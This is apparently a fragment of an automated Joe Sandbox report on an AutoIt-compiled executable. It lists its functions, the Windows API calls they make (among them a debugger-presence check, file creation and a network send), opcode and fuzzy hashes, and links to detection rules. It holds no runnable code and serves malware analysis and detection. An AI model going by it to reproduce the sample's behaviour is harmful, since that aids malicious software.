                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscmp
                                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                                        • API String ID: 856254489-3771769585
                                                                                                                                                        • Opcode ID: b415e311c88699fceed4077710ad7dfa1963519925cd1413ba53c7294d3312c0
                                                                                                                                                        • Instruction ID: 5573a757add16c8aacc32b1300372ff9cd12aacf17eea6fa2bba1b700dc43c7b
                                                                                                                                                        • Opcode Fuzzy Hash: b415e311c88699fceed4077710ad7dfa1963519925cd1413ba53c7294d3312c0
                                                                                                                                                        • Instruction Fuzzy Hash: 9511C635704214DFCB04EF55DA91E99B3F9AF85710B148099F509AF395DAB0EDC1CBA0
                                                                                                                                                        Function 00A93BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00B03CF1
                                                                                                                                                          • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                                                                                                                                                          • Part of subcall function 00A93A67: SHGetMalloc.SHELL32(00A93C31), ref: 00A93A7D
                                                                                                                                                          • Part of subcall function 00A93A67: SHGetDesktopFolder.SHELL32(?), ref: 00A93A8F
                                                                                                                                                          • Part of subcall function 00A93A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00A93AD2
                                                                                                                                                          • Part of subcall function 00A93B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00B522E8,?), ref: 00A93B65
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                                                        • String ID: X
                                                                                                                                                        • API String ID: 2727075218-3081909835
                                                                                                                                                        • Opcode ID: 4412d034248aef9b94ca105443001e800aee0e65ff8c8133d2f7a9e9259b5981
                                                                                                                                                        • Instruction ID: 693661f1d89a1a1c8781f46895d9f9dd7665cf435872023608b58773a167c498
                                                                                                                                                        • Opcode Fuzzy Hash: 4412d034248aef9b94ca105443001e800aee0e65ff8c8133d2f7a9e9259b5981
                                                                                                                                                        • Instruction Fuzzy Hash: 6611CA72B00288ABCF05DFD8D8096DEBBFDAF45704F04800AE401BB281CBB55B498BA5
                                                                                                                                                        Function 00A934C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00B034AA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                        • API String ID: 1029625771-2684727018
                                                                                                                                                        • Opcode ID: 4d0f4ced452bc66f85dcab8f42ed5908212dae26d5b5c11fc5901f546e44c761
                                                                                                                                                        • Instruction ID: d2acea4acb70ccea95eb2ee28fadd910ee2f8c3b91aa86220c10fd33370dd6a7
                                                                                                                                                        • Opcode Fuzzy Hash: 4d0f4ced452bc66f85dcab8f42ed5908212dae26d5b5c11fc5901f546e44c761
                                                                                                                                                        • Instruction Fuzzy Hash: 80F06872A0020DAECF11EFB0D9519FFB7FCAE10310F548566E81692192EB349B09CB21
                                                                                                                                                        Function 00AAF461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2cd6c9d27234ee81d27eb122f5750c87ac17bc6f79916e910f5c586615219d05
                                                                                                                                                        • Instruction ID: 3e9062830c162b861b87959b76b8b60bb60eb3424e77f9f67cbebd6810e3a89d
                                                                                                                                                        • Opcode Fuzzy Hash: 2cd6c9d27234ee81d27eb122f5750c87ac17bc6f79916e910f5c586615219d05
                                                                                                                                                        • Instruction Fuzzy Hash: C55181316043029FCB18EF68D591BAA77E5EF89320F14856DF99A8B2D2DB30E845CB51
                                                                                                                                                        Function 00AE8065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AE8074
                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00AE807A
                                                                                                                                                          • Part of subcall function 00AE6B19: GetWindowRect.USER32(?,?), ref: 00AE6B2C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$CursorForegroundRect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1066937146-0
                                                                                                                                                        • Opcode ID: 81d45fd201c876bd1ddbe0e77c067953cb87cee2955cef72557a229ad0362099
                                                                                                                                                        • Instruction ID: 02c9c2dbc7467b50019a5b853daf275acc6963f497d25e789a7a45da2a8b0f56
                                                                                                                                                        • Opcode Fuzzy Hash: 81d45fd201c876bd1ddbe0e77c067953cb87cee2955cef72557a229ad0362099
                                                                                                                                                        • Instruction Fuzzy Hash: 6A314F75A00209AFDF00EFA5CD81BEEB7B8FF14314F10452AE956A7251DB38AE55CB90
                                                                                                                                                        Function 00A91DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00B0DB31
                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00B0DB6B
                                                                                                                                                          • Part of subcall function 00A91F04: GetForegroundWindow.USER32 ref: 00A91FBE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Foreground
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 62970417-0
                                                                                                                                                        • Opcode ID: 3e417c817ef97209d0e6a969962426afa21520f0c136cf555f606b7e9bd8086f
                                                                                                                                                        • Instruction ID: c6de3205f1b211aa3d237c55cab318babe1f96fc76c384db8a2fdaa49ef478cc
                                                                                                                                                        • Opcode Fuzzy Hash: 3e417c817ef97209d0e6a969962426afa21520f0c136cf555f606b7e9bd8086f
                                                                                                                                                        • Instruction Fuzzy Hash: E3219D72700206AADF11AB74C981FFE7BEAAF80784F014429F95B87181DF70EE019760
                                                                                                                                                        Function 00ACE2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A91952
                                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ACE344
                                                                                                                                                        • _strlen.LIBCMT ref: 00ACE34F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Timeout_strlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2777139624-0
                                                                                                                                                        • Opcode ID: db8f5e3357709c55aede9be530ddd15377c642929003a27acf89f601bee1365f
                                                                                                                                                        • Instruction ID: 781080f0f00ebb0568124464148e75acf76c2f6975f78a039ec955db295be013
                                                                                                                                                        • Opcode Fuzzy Hash: db8f5e3357709c55aede9be530ddd15377c642929003a27acf89f601bee1365f
                                                                                                                                                        • Instruction Fuzzy Hash: 7011A031700245ABDF05FB68ED86EBF7BE99F45350B00443EF6069F292DE64A84687A0
                                                                                                                                                        Function 00A93682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • 74C3C8D0.UXTHEME ref: 00A936E6
                                                                                                                                                          • Part of subcall function 00AB2025: __lock.LIBCMT ref: 00AB202B
                                                                                                                                                          • Part of subcall function 00A932DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A932F6
                                                                                                                                                          • Part of subcall function 00A932DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A9330B
                                                                                                                                                          • Part of subcall function 00A9374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00A9376D
                                                                                                                                                          • Part of subcall function 00A9374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00A9377F
                                                                                                                                                          • Part of subcall function 00A9374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_JPS.exe,00000104,?,00B51120,C:\Users\user\Desktop\._cache_JPS.exe,00B51124,?,?), ref: 00A937EE
                                                                                                                                                          • Part of subcall function 00A9374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00A93860
                                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00A93726
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3809921791-0
                                                                                                                                                        • Opcode ID: b2a8335f1aea534c47060a304f8580a7677bfc7b384261e19d7213178911afb4
                                                                                                                                                        • Instruction ID: e36677bea15da1c168510c0db27a7e72214a990a2d0d4cea26150ddc9bd0fe9f
                                                                                                                                                        • Opcode Fuzzy Hash: b2a8335f1aea534c47060a304f8580a7677bfc7b384261e19d7213178911afb4
                                                                                                                                                        • Instruction Fuzzy Hash: F611AC719083419FC700EF29DA09B4EBBF9FB85710F00895EF444872A1DB709A44CB92
                                                                                                                                                        Function 00A94B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00A94C2B,?,?,?,?,00A9BE63), ref: 00A94BB6
                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00A94C2B,?,?,?,?,00A9BE63), ref: 00B04972
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: 4009cabc58531e4899fe77df0d46746ee33a8d0e3fb4671dda765337d3ed0548
                                                                                                                                                        • Instruction ID: 6ba737f3eb945db459def51b36ef9b508e9465c392977b48120845711dcc5bb8
                                                                                                                                                        • Opcode Fuzzy Hash: 4009cabc58531e4899fe77df0d46746ee33a8d0e3fb4671dda765337d3ed0548
                                                                                                                                                        • Instruction Fuzzy Hash: 82017970248308BEF7344E18CC8AF667BDCEB15768F108355BAE56A1E0C6B55C55CB54
                                                                                                                                                        Function 00AAF26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF282
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF2A6
                                                                                                                                                          • Part of subcall function 00AAF2D0: _memmove.LIBCMT ref: 00AAF307
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3033907384-0
                                                                                                                                                        • Opcode ID: b941c3234f2c37fa4c19e854cbb04617f5fbfd42f9fcbd00e2639ad937dfe11f
                                                                                                                                                        • Instruction ID: 5f0c87f30693ebb0fccc96739583d4d0915c2af460f84f4580961075177bc296
                                                                                                                                                        • Opcode Fuzzy Hash: b941c3234f2c37fa4c19e854cbb04617f5fbfd42f9fcbd00e2639ad937dfe11f
                                                                                                                                                        • Instruction Fuzzy Hash: 76F04FB6104114BFAB19ABA5EC44EFB7FADEF8A3607408126FD08CB151DA31DC018671
                                                                                                                                                        Function 00ABF782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ___lock_fhandle.LIBCMT ref: 00ABF7D9
                                                                                                                                                        • __close_nolock.LIBCMT ref: 00ABF7F2
                                                                                                                                                          • Part of subcall function 00AB886A: __getptd_noexit.LIBCMT ref: 00AB886A
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1046115767-0
                                                                                                                                                        • Opcode ID: bad7f9c26a3c33ab126974cc6c0944a532f1e23c1a28197f54066af0d153989b
                                                                                                                                                        • Instruction ID: a826b853a7ee939cf8f1caeebaf779a10fef3772c101d0c110a53d894eaffb16
                                                                                                                                                        • Opcode Fuzzy Hash: bad7f9c26a3c33ab126974cc6c0944a532f1e23c1a28197f54066af0d153989b
                                                                                                                                                        • Instruction Fuzzy Hash: 56117C32815A509FD7117FF89E463D87AAC6F42331F6A02A4E5205B1E3CFB85940C7A1
                                                                                                                                                        Function 00AE9500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 00AE9534
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00AE9557
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
